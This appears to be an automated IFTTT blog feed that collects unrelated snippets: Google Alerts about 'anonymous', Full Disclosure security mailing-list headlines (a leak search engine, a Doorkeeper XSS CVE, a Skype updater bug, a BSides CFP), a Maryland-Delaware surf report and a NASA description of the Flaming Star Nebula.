Toby K. (Unity Day, 2018). February 25, 2018 S LT. Toby K. (Unity Day, 2018). OASF. Share. ← Peggy W. (Unity Day, 2018)Trish T. (Century Meeting) → · MEETINGS EVENTS FOR NEWCOMERS FOR MEDICAL PROFESSIONALS About OASF IntergrouP OA WORLD SERVICE. To suggest updates to ...

from Google Alert - anonymous http://ift.tt/2F4vhyd
via IFTTT

anonymous galaxy



from Google Alert - anonymous http://ift.tt/2FttD7b
via IFTTT

atlantanascar2018livestream

atlantanascar2018livestream. Watch Live>>> http://ift.tt/2FttBw5. Folds of Honor QuikTrip 500 from Atlanta Motor Speedway. The start time of the race was moved up one hour to 1 p.m. ET (Fox, Fox Sports Go) because of inclement weather. Kyle Busch has the pole position thanks .Folds of ...

from Google Alert - anonymous http://ift.tt/2ETa4UI
via IFTTT

Anonymous user 3743a8

Name, Anonymous user 3743a8. User since, Feb. 25, 2018. Number of add-ons developed, 1 theme. Average rating of developer's add-ons, Not yet rated ...

from Google Alert - anonymous http://ift.tt/2ETa1Iw
via IFTTT

Progress Continues On Anonymous Bitcoin Transactions

For a long time, bitcoin has been perceived by many as an anonymous payment system for online purchases. This myth has been largely propagated by mass media when bitcoin emerged as a popular payment method on the dark web. However, this is far from the truth. Due to its publicly viewable ...

from Google Alert - anonymous http://ift.tt/2F0Xfv3
via IFTTT

[FD] Search engine of leaks

I started working with a leaks search engine and although it has some other bug, it is very complete. This search engine works with such sources that it analyzes from: 1) - Github 2) - Pastebin 3) -Robtex 4) - Shodan 5) - Censys 6) - Email Sherlock 7) - Threatcrowd 8) Alienvault 9) - Netcraft 10) -Shodan 11) - Threatminer. 12) - public ftps repos search engine: filemare 13) - Archive.is: A search engine like waybackmachine but graphic xD. 14) - Vulners: A database of exploits and organizations with bugs that have been reported. Tips to look for: use inurl. For example: Sqli inurl:pastebin OR Sqli inurl:vulners Both: Sqli inurl:pastebin OR inurl:vulners Link: http://ift.tt/2FyJaTq I await your opinions. Rootkit

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [CVE-2018-1000088] Stored XSS vulnerability in Doorkeeper gem v2.1.0 - v4.2.5

[FD] [CVE-2018-1000088] Stored XSS vulnerability in Doorkeeper gem v2.1.0 - v4.2.5

Hey everyone, A security bulletin for you. Software:

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Defense in depth -- the Microsoft way (part 51): Skype's home-grown updater allows escalation of privilege to SYSTEM

[FD] BSides Denver 2018 CFP is open

Greetings! Security BSides in the mile high city, Denver CO, is accepting submissions for speakers and presentations for our 2018 event. Our CFP submission form is online at: https://goo.gl/forms/ZEIlX9qkZDUAYGuw1 We look forward to your submissions and hope you can participate in our community event! www.BSidesDen.org - Jeff Pettorino

Source: Gmail -> IFTTT-> Blogger

8th St.'s surf is at least 5.69ft high

Maryland-Delaware, March 03, 2018 at 08:00AM

8th St. Summary
At 2:00 AM, surf min of 3.47ft. At 8:00 AM, surf min of 5.69ft. At 2:00 PM, surf min of 6.05ft. At 8:00 PM, surf min of 7.73ft.

Surf maximum: 6.81ft (2.07m)
Surf minimum: 5.69ft (1.74m)
Tide height: 4.03ft (1.23m)
Wind direction: NNE
Wind speed: 17.69 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

"Unaccountable at the Founding: The Originalist Case for Anonymous Juri" by Kory A. Langhofer

Recommended Citation. Kory A. Langhofer, Unaccountable at the Founding: The Originalist Case for Anonymous Juries, 115 Yale L.J. (2006). Available at: http://ift.tt/2HJoQPX. Download ...

from Google Alert - anonymous http://ift.tt/2ETRHzd
via IFTTT

Geoip2 anonymous ip database download

Locations are often near the center of the population. mmdb' enterprise: 'GeoIP2-Enterprise' domain: 'GeoIP2-Domain. 101. postal_code, string, The postal code associated with the IP address. mmdb. . Use the GeoIP2 Anonymous IP database to identify anonymizers in support of geofiltering, ...

from Google Alert - anonymous http://ift.tt/2CHztyT
via IFTTT

AE Aurigae and the Flaming Star Nebula


Why is AE Aurigae called the flaming star? For one reason, the surrounding nebula IC 405 is named the Flaming Star Nebula because the region seems to harbor smoke, even though nothing is on fire, including interior star AE Aurigae. Fire, typically defined as the rapid molecular acquisition of oxygen, happens only when sufficient oxygen is present and is not important in such high-energy, low-oxygen environments. The material that appears as smoke is mostly interstellar hydrogen, but does contain smoke-like dark filaments of carbon-rich dust grains. The bright star AE Aurigae is visible near the nebula center and is so hot it is blue, emitting light so energetic it knocks electrons away from atoms in the surrounding gas. When an atom recaptures an electron, light is emitted creating the surrounding emission nebula. The Flaming Star nebula lies about 1,500 light years distant, spans about 5 light years, and is visible with a small telescope toward the constellation of the Charioteer (Auriga). via NASA http://ift.tt/2oAo2UP